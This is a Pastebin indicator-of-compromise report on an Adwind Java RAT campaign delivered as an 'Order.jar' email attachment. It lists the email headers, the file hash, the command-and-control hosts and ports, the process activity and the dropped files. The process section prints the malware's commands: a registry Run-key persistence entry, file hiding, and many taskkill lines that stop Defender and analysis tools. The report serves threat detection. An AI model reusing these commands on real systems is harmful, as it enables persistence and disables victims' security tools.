SHARE
TWEET

#adwind_261218

VRad Dec 27th, 2018 (edited) 129 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #Adwind #Java #JAR #JRE
  2.  
  3. https://pastebin.com/BqbDN6Sr
  4.  
  5. FAQ:
  6. https://radetskiy.wordpress.com/2018/05/11/ioc_adwind_100518/
  7.  
  8. attack_vector
  9. --------------
  10. email attach .JAR > WSH > JRE > AppData\Roaming\*.jar + *.vbs
  11.  
  12. email_headers
  13. --------------
  14. Received: from gunimo.com ([167.99.137.237])
  15.     by srv8.victim1.com for <user0@org7.victim1.com>;
  16.     Wed, 26 Dec 2018 12:24:21 +0200 (EET)
  17.     (envelope-from tony.turner@stoneacre.co.uk)
  18. Received: from [102.165.33.14]
  19.     by gunimo.com with esmtpsa (TLS1.0:DHE_RSA_AES_256_CBC_SHA1:256)
  20.     (Exim 4.84_2) (envelope-from <tony.turner@stoneacre.co.uk>)
  21.     id 1gZrOo-0001md-CS; Thu, 20 Dec 2018 06:01:44 +0000
  22. Subject: Order
  23. To: Recipients <tony.turner@stoneacre.co.uk>
  24. From: "Tony" <tony.turner@stoneacre.co.uk>
  25.  
  26. files
  27. --------------
  28. SHA-256 b5cf1f4216841631e80ad31be8f623399d2a2c7057d3f7a062c9c7b2055eec11
  29. File name   Order.jar
  30. File size   634.28 KB
  31.  
  32. activity
  33. **************
  34.  
  35. JAR > JRE > WSH > JRE > collect system info & open remote connection
  36.  
  37. netwrk
  38. --------------
  39. 185.183.97.184  goz.unknowncrypter{.} com:7789  POST /is-ready HTTP/1.1    
  40. AC38D1C7<|>APM11<|>operator<|>Microsoft Windows 7 ... <|>plus<|>nan-av<|>false - 26.12.2018
  41.  
  42. comp
  43. --------------
  44. java.exe    2628    TCP 127.0.0.1       7777    SYN_SENT
  45. wscript.exe 2104    TCP 185.183.97.184  7789    ESTABLISHED
  46. javaw.exe   976     TCP 185.244.30.121  4379    SYN_SENT
  47.  
  48. proc
  49. --------------
  50. "C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -jar "C:\Users\operator\Desktop\Order.jar"
  51. C:\Windows\system32\wscript.exe  C:\Users\operator\ufcgwhauov.vbs
  52. "C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\dVvzehDtJK.vbs"
  53. C:\Windows\System32\cmd.exe" /c "C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -version 2> C:\tmp\output.txt
  54. "C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe"  -version
  55. "C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe"  -jar "C:\Users\operator\AppData\Roaming\ntfsmgr.jar"
  56. "C:\Program Files\Java\jre1.8.0_191\bin\java.exe" -jar C:\tmp\_0.90765668489300629104286604121415413.class
  57.  
  58. C:\Windows\system32\cmd.exe
  59.     C:\tmp\Retrive275305157297834866.vbs
  60.     C:\tmp\Retrive3342971358066659593.vbs
  61.     C:\tmp\Retrive5146022430127275435.vbs
  62.     C:\tmp\Retrive118764366264415957.vbs
  63.  
  64. C:\Windows\system32\xcopy.exe  "C:\Program Files\Java\jre1.8.0_191" "C:\Users\operator\AppData\Roaming\Oracle\" /e
  65.  
  66. C:\Windows\system32\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v zaRukQhXbGj /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI\"" /f
  67.  
  68. C:\Windows\system32\attrib.exe attrib +h "C:\Users\operator\TpTuKAZzLlb\*.*"
  69.  
  70. C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI
  71. C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe -jar C:\tmp\_0.58402873485980682215056483974766042.class
  72. C:\Windows\system32\cmd.exe
  73.     C:\tmp\Retrive3841406484415973045.vbs
  74.     C:\tmp\Retrive4727136555263513640.vbs
  75.     C:\tmp\Retrive7570843625298647226.vbs
  76.     C:\tmp\Retrive8366581331663954177.vbs
  77.        
  78. C:\Windows\system32\taskkill.exe /IM ProcessHacker.exe /T /F
  79.  
  80. C:\Windows\system32\cmd.exe  /c regedit.exe /s C:\tmp\CEBqbLoDPx3000572971971620291.reg
  81.  
  82. C:\Windows\system32\taskkill.exe
  83.  
  84. taskkill /IM MSASCui.exe /T /F
  85. taskkill /IM MsMpEng.exe /T /F
  86. taskkill /IM MpUXSrv.exe /T /F
  87. taskkill /IM MpCmdRun.exe /T /F
  88. taskkill /IM NisSrv.exe /T /F
  89. taskkill /IM ConfigSecurityPolicy.exe /T /F
  90. taskkill /IM procexp.exe /T /F
  91. taskkill /IM wireshark.exe /T /F
  92. ...
  93. taskkill /IM FortiClient_Diagnostic_Tool.exe /T /F
  94. taskkill /IM twsscan.exe /T /F
  95. taskkill /IM UserReg.exe /T /F
  96.  
  97.  
  98. persist
  99. --------------
  100. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              26.12.2018 17:38   
  101.  
  102. @dVvzehDtJK        
  103. c:\users\operator\appdata\roaming\dvvzehdtjk.vbs    26.12.2018 17:38
  104. wscript.exe //B "C:\Users\operator\AppData\Roaming\dVvzehDtJK.vbs"
  105.    
  106. @ntfsmgr    Java(TM) Platform SE binary Oracle Corporation 
  107. c:\program files\java\jre1.8.0_191\bin\javaw.exe    06.10.2018 18:42   
  108. "C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -jar "C:\Users\operator\AppData\Roaming\ntfsmgr.jar"
  109.  
  110. @zaRukQhXbGj    Java(TM) Platform SE binary Oracle Corporation 
  111. c:\users\operator\appdata\roaming\oracle\bin\javaw.exe  06.10.2018 18:42   
  112. "C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar "C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI"
  113.  
  114. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup             26.12.2018 17:38   
  115. @dVvzehDtJK.vbs        
  116. c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\dvvzehdtjk.vbs  26.12.2018 17:38   
  117. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dVvzehDtJK.vbs
  118.  
  119. drop
  120. --------------
  121.  C:\Users\operator\ufcgwhauov.vbs
  122.  C:\Users\operator\AppData\Roaming\dVvzehDtJK.vbs
  123.  C:\tmp\output.txt
  124.  C:\Users\operator\AppData\Roaming\ntfsmgr.jar
  125.  C:\tmp\_0.90765668489300629104286604121415413.class
  126.  C:\tmp\Retrive275305157297834866.
  127.  C:\tmp\Retrive3342971358066659593.vbs
  128.  C:\tmp\Retrive5146022430127275435.vbs
  129.  C:\tmp\Retrive118764366264415957.vbs
  130.  C:\Users\operator\AppData\Roaming\Oracle\
  131.  C:\Users\operator\TpTuKAZzLlb\
  132.  C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI
  133.  C:\Users\operator\fUTkALeaTxM\
  134.  C:\tmp\_0.58402873485980682215056483974766042.class
  135.  C:\tmp\Retrive3841406484415973045.vbs
  136.  C:\tmp\Retrive4727136555263513640.vbs
  137.  C:\tmp\Retrive7570843625298647226.vbs
  138.  C:\tmp\Retrive8366581331663954177.vbs
  139.  C:\tmp\CEBqbLoDPx3000572971971620291.reg
  140.  
  141. VR
  142.  
  143. # # #
  144. https://www.virustotal.com/#/file/b5cf1f4216841631e80ad31be8f623399d2a2c7057d3f7a062c9c7b2055eec11/details
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top